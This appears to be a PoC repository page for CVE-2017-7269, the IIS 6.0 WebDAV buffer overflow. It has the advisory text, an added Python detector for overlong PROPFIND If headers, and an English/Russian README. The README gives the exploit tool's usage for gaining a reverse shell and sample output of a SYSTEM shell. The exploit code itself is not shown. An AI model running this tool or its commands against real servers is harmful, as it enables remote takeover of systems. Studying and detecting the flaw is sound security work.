CVE-2017-7269 PoC — Microsoft Internet Information Services buffer error vulnerability

Associated Vulnerability
Title: Microsoft Internet Information Services buffer error vulnerability (CVE-2017-7269)
Description: Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.
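
A defensive check for the request shape named in the description above (a PROPFIND whose `If` header begins with `<http://` and is unusually long), as an added example that is not part of the PoC repository. The 512-byte threshold, the function names and the sample requests are assumptions constructed for illustration.

```python
import re

# Assumed threshold, not from the advisory: ordinary WebDAV If headers carry a
# short resource tag and lock token. Tune against your own traffic.
MAX_IF_LEN = 512

def parse_request(raw: bytes):
    """Return (method, {lowercased header name: [values]}) for a raw HTTP request."""
    head = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)[0]
    lines = re.split(rb"\r?\n", head)
    method = lines[0].split(b" ", 1)[0].decode("latin-1").upper()
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            key = name.strip().lower().decode("latin-1")
            headers.setdefault(key, []).append(value.strip())
    return method, headers

def flag_cve_2017_7269(raw: bytes, max_len: int = MAX_IF_LEN):
    """Return a finding dict when the request matches the CVE description, else None."""
    method, headers = parse_request(raw)
    if method != "PROPFIND":
        return None
    for value in headers.get("if", []):
        # Header name match is case-insensitive; the value must open with <http://
        if value.lower().startswith(b"<http://") and len(value) > max_len:
            return {"method": method, "if_len": len(value)}
    return None

# Constructed sample requests (not captured traffic).
BENIGN = (b"PROPFIND /docs/ HTTP/1.1\r\nHost: example.local\r\nDepth: 1\r\n"
          b"If: <http://example.local/docs/> (<opaquelocktoken:constructed-token>)\r\n"
          b"Content-Length: 0\r\n\r\n")
LONG_IF = b"<http://example.local/" + b"A" * 2000 + b">"
OVERLONG = (b"PROPFIND / HTTP/1.1\r\nHost: example.local\r\nIf: " + LONG_IF +
            b"\r\nContent-Length: 0\r\n\r\n")
NOT_PROPFIND = OVERLONG.replace(b"PROPFIND", b"GET", 1)

if __name__ == "__main__":
    for name, req in [("benign", BENIGN), ("overlong", OVERLONG), ("get", NOT_PROPFIND)]:
        print(name, flag_cve_2017_7269(req))
```

The same predicate can be applied at a reverse proxy or in a packet-capture pipeline in front of any remaining IIS 6.0 hosts, where the raw request headers are still available.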
Description
CVE-2017-7269
Readme

# EN
**GenWebDavIISExploit** is a PoC tool demonstrating an exploit for a known vulnerability in the WebDAV component of IIS6. This tool is designed for educational and research purposes to showcase how the vulnerability can be leveraged to execute arbitrary code on a remote server.

## Disclaimer

This project is intended for **educational purposes only**. Use this tool responsibly and only on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

## Features

- Remote code execution on vulnerable IIS6 WebDAV servers.
- Dynamic payload generation with user-specified reverse IP and port.
- Easy-to-use command-line interface for rapid exploitation.

## Prerequisites

- **Python 3.x**: Ensure that Python 3 is installed on your system.
- **Network Access**: Ability to connect to the target machine's IP and port.

## Usage
### Command-Line Arguments

- **Target IP**: The IP address of the target IIS6 WebDAV server.
- **Target Port**: The port number on which the WebDAV service is running (usually 80).
- **Reverse IP**: Your IP address where the reverse shell should connect.
- **Reverse Port**: The port number on your system to receive the reverse shell.

## Example

```bash
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
```

## Usage Example

```bash
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
```

## Example output
```
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Connecting to target 192.168.1.10 on port 80...
[*] Sending a specially crafted HTTP request to exploit the vulnerability...
[*] Payload length: 1744 bytes
[*] Waiting for a return connection...

[+] Response from target:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Received a connection back from 192.168.1.10:12345
[+] Remote access successfully established!

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> ipconfig
Windows IP Configuration

   Ethernet Local Area Connection adapter:
      DNS connection suffix . . . . . . : example.local
      IPv4 address. . . . . . . . . . . : 192.168.1.10
      Subnet mask . . . . . . . . . . . : 255.255.255.0
      Main gateway. . . . . . . . . . . : 192.168.1.1
```


## Notes
- Ensure you have a listener running on the specified reverse port to capture the incoming reverse shell.
- Use this tool only on authorized systems to test for vulnerabilities.


# RU
**GenWebDavIISExploit** is a PoC tool that demonstrates exploitation of a known vulnerability in the WebDAV component on IIS6. This tool is created for educational and research purposes to show how the vulnerability can be exploited to execute arbitrary code on a remote server.


## Disclaimer

This project is intended **for educational purposes only**. Use this tool responsibly and only on systems that you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

## Features

- Execution of remote code on vulnerable IIS6 WebDAV servers.
- Dynamic payload code generation with IP and port specification for the reverse connection.
- Simple command line interface for quick use.

## Requirements

- **Python 3.x**: Make sure you have Python 3 installed.
- **Network Access**: Ability to connect to the target machine's IP address and port.


## Usage

### Command line arguments

- **Target IP**: IP address of the target IIS6 WebDAV server.
- **Target Port**: The port number on which the WebDAV service is running (usually 80).
- **Reverse IP**: Your IP address to which the reverse connection should be established.
- **Reverse Port**: The port number on your system to receive the reverse connection.

## Example

```bash
python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
```

## Example usage

```bash
python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
```

## Example output
```
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Connecting to target 192.168.1.10 on port 80...
[*] Sending a specially crafted HTTP request to exploit the vulnerability...
[*] Payload length: 1744 bytes
[*] Waiting for a return connection...

[+] Response from target:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Received back connection from 192.168.1.10:12345
[+] Remote access successfully established!

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> ipconfig
Windows IP Configuration

   Ethernet Local Area Connection adapter:
      DNS connection suffix . . . . . . : example.local
      IPv4 address. . . . . . . . . . . : 192.168.1.10
      Subnet Mask . . . . . . . . . . . : 255.255.255.0
      Default Gateway . . . . . . . . . : 192.168.1.1
```


## Notes

- Make sure you have a listener running on the specified reverse port to intercept the incoming reverse connection.
- Use this tool only on authorized systems to check for vulnerabilities.

File Snapshot

```
[4.0K] /data/pocs/100479bf52034f6788e657496f2755b9724b5f14
├── [ 15K] GenWebDavIISExploit.py
├── [1.0K] LICENSE
└── [5.2K] README.md

0 directories, 3 files
```